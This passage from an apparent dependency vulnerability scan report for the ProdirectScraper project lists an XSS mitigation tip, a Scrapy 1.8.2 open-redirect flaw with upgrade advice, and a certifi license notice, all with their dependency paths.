- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
Upgrade Twisted to version 24.7.0rc1 or higher.
medium severity
- Vulnerable module: scrapy
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2
  Remediation: Upgrade to scrapy@2.11.2.
Overview
Scrapy is a high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.
Affected versions of this package are vulnerable to URL Redirection to Untrusted Site ('Open Redirect') due to the improper handling of scheme-specific proxy settings during HTTP redirects. An attacker can potentially intercept sensitive information by exploiting the failure to switch proxies when redirected from HTTP to HTTPS URLs or vice versa.
Remediation
Upgrade Scrapy to version 2.11.2 or higher.
medium severity (new)
- Module: certifi
- Introduced through: scrapy@1.8.2
Detailed paths
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests@2.31.0 › certifi@2025.1.31
- Introduced through: ZoranPandovski/ProdirectScraper@ZoranPandovski/ProdirectScraper#1ab18b20f45cee821d0efa5f32f05591eceb8a4a › scrapy@1.8.2 › tldextract@4.0.0 › requests-file@2.1.0 › requests@2.31.0 › certifi@2025.1.31
MPL-2.0 license